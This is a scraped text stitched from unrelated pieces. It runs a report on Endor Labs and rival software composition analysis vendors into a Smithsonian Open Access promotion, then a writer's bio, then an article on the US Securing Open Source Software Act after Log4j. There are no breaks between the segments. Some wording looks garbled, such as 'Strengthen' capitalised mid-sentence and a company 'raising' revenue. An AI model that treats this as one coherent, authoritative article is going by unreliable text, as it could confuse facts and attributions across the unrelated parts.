“Eighty percent of the code in modern applications is code your developers didn’t write but depend on through open-source packages. When our founding team was leading the Prisma Cloud engineering group at Palo Alto Networks, we realized the true magnitude of this issue,” said cofounder and CEO, Endor Labs, Varun Badhwar.
“Having previously created the cloud security posture management (CSPM) category, this team knows how to take on next-generation threats. Our mission is to enable OSS [open-source software] to live up to its true potential without introducing unnecessary risk. It’s exciting to once again take a new approach to the market, and we believe these solutions will radically enhance application development everywhere,” Badhwar said.
In an era where the U.S. government is calling on enterprises to produce SBOMs and increase the maturity of open-source security, Endor Labs offers a solution to monitor dependencies and increase transparency over how they’re used throughout the organization to build an accurate SBOM.
Instead of just pointing out insecure dependencies, Endor Labs also enables users to pick dependencies that are less vulnerable to compromise.
Traditionally, organizations use software composition analysis (SCA) tools to analyze applications and detect open-source software. SCA tools can check the security of the code used in critical applications. Researchers estimated the software composition analysis market would reach $398.4 million by 2022.
One of the main vendors in this market is Snyk, with Snyk Open Source, a tool for automatically monitoring process and code for vulnerabilities with the assistance of open source vulnerability intelligence, while offering real-time reporting capabilities to support GRC teams.
Snyk most recently raised $530 million as part of a series F funding round in 2021, bringing its total valuation to $8.5 billion.
Another significant competitor is Synopsys with Black Duck, which combines multifactor open-source detection and a KnowledgeBase of over 4 million components to increase transparency over applications and containers to offer automated vulnerability notifications, reports that detail severity, and more.
Synopsys recently announced raising $1.25 billion in revenue for Q3 FY 2022.
However, Badhwar argues that Endor Labs differentiates itself from SCA tools based on its ability to help select secure and high-quality dependencies. Traditional SCA tools offer limited context on how dependencies are used and potential alternatives.
VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings.
Welcome to Smithsonian Open Access, where you can download, share, and reuse millions of the Smithsonian’s images—right now, without asking. With new platforms and tools, you have easier access to more than 4.4 million 2D and 3D digital items from our collections—with many more to come. This includes images and data from across the Smithsonian’s 19 museums, nine research centers, libraries, archives, and the National Zoo.
What will you create?
Remixes by: Access Smithsonian, Amazon Web Services-Sumerian, Amy Karle, An Open Book Foundation, AstroNuts, Autodesk Tinkercad, Cesium, Chris Funk & N M Bodecker Foundation, Creative Commons, Duke University-MorphoSource, Georgetown University Maker Hub in Lauinger Library, Google Arts & Culture, The Khronos Group, MHz Foundation, Michael Joo, Matthew Putman, and James J. Williams III, Sketchfab, Smithsonian Center for Learning and Digital Access, Smithsonian Data Science Lab, Smithsonian Libraries & Museum in a Box, Wikimedia DC
The Smithsonian Open Access launch event is presented in partnership with:
Data hosting provided by AWS Public Dataset Program
The Smithsonian Open Access launch event is presented in partnership with:
Data hosting provided by AWS Public Dataset Program
Alisa Stevens has been writing articles and business/marketing materials since 1994. She has experience writing for and about a variety of industries, including the legal, transportation, government and education sectors. Stevens holds a B.A. in journalism and an M.B.A. from Arizona State University, as well as a J.D. from Loyola Law School.
There's at least one thing Republicans and Democrats can agree on in the US Senate: the importance of open-source software. Seriously.
As US Senator Gary Peters (D-MI) said last week, "Open-source software is the bedrock of the digital world." His partner across the aisle, Rob Portman (R-OH), agreed, saying, "The computers, phones, and websites we all use every day contain open-source software that is vulnerable to cyberattack."
Therefore, "The bipartisan Securing Open Source Software Act [PDF] will ensure that the US government anticipates and mitigates security vulnerabilities in open-source software to protect Americans' most sensitive data."
This bill proposes that since the Log4j security blow-up in 2021, and its continuing aftershocks, showed just how vulnerable we are to open-source code attacks, the Cybersecurity and Infrastructure Security Agency (CISA) must help "ensure that open-source software is used safely and securely by the federal government, critical infrastructure, and others."
After all, the Sept. 22 government release introducing the legislation added, "The overwhelming majority of computers in the world rely on open-source code." This is far from the first time that the federal government has taken note of just how vital open-source software has become to everyone. In January, the US Federal Trade Commission warned it would punish companies that don't fix their Log4j security problems.
The US government has long supported open-source software. For example, all the way back in 2000, the National Security Agency helped create Security-Enhanced Linux (SELinux). And, in 2016, then-US Chief Information Officer Tony Scott proposed a pro-open-source coding policy that required any "new software developed specifically for or by the federal government to be made available for sharing and reuse across federal agencies. It also includes a pilot program that will result in a portion of that new federally funded custom code being released to the public."
Also: XeroLinux could be the most beautiful Linux desktop on the market
The Securing Open Source Software Act, however, moves open source from the realm of policy and regulation decisions into federal law. This bill will direct the CISA to develop a risk framework to evaluate how open-source code is used by the federal government. The CISA would also decide on how the same framework could be used by critical infrastructure owners and operators.
According to the Open Source Security Foundation (OpenSSF) in its analysis of the Act, the "CISA would produce an initial assessment framework for handling open-source code risk, incorporating government, industry, and open-source community frameworks and best practices from software security."
In short, the CISA would not try to reinvent the wheel, instead using the best of existing open-source security techniques. This follows in the footsteps of President Joseph Biden's Executive Order on Improving the Nation's Cybersecurity, which stated that developers must provide "a purchaser with an SBOM [Software Bill of Materials] for each application."
The Act will also require the CISA to identify ways to mitigate open-source software risks. To make that happen, it requires the CISA to hire open-source developers to address security issues. It also proposes that some Federal agencies start Open Source Program Offices (OSPO). Finally, it will require the Office of Management and Budget (OMB) to fund a CISA software security subcommittee and issue federal guidance on how users can secure open-source software.
People who follow open-source security closely have heard much of this before. As the OpenSSF noted, "Some of the ideas sound familiar to us -- for example, the use of SBOMs, the importance of security practices of development, build, and release processes), and a call for a risk assessment framework [echo] our Risk Assessment Dashboard stream from our Mobilization Plan."
But, surprisingly, the bill misses other points. For example, all software, not just open source, should be checked for potential risk. As Brad Arkin, Cisco's SVP and chief security and trust officer, testified to Congress about Log4J: "Open-source software did not fail, as some have suggested, and it would be misguided to suggest that the Log4j vulnerability is evidence of a unique flaw or increased risk with open-source software. The truth is that all software contains vulnerabilities due to inherent flaws of human judgment in designing, integrating, and writing software."
Also: It's time to stop using C and C++ for new projects, says Microsoft Azure CTO
Still, imperfect as the bill may be, the OpenSSF says it is "committed to collaborating and working both upstream and with existing communities to advance open source security for all. We look forward to collaborating with policymakers around the world to Strengthen the security of the software we all depend on."
The OpenSSF isn't the only group that's willing to work with the government to fundamentally Strengthen open-source security but also has concerns. Open Source Initiative (OSI) US Policy Director Deb Bryant worries Congress is "building a framework which is targeted to treat open source as a special class of software instead of solving it for all of software."
Heather Meeker, a well-known open-source lawyer and OSS Capital general partner, more optimistically added, "It's good to see a bipartisan effort to Strengthen management of security in software infrastructure -- including open-source software. The private market has long clamored for this improvement, via customer demands and expectations for software and cloud services vendors. But government oversight may help accelerate improvement efforts outside of commercial vendor arrangements, or in situations where vendor market power allows vendors to push back against customer demands."
Of course, just because a bill reaches Congress doesn't mean it will become law. Still, its committee advanced the bill to the Senate floor on Sept. 29. That's very fast for any bill on any issue. If it makes it through Congress, there seems no doubt that Biden will sign it into law. With luck, securing open-source software will become the law of the land in 2023.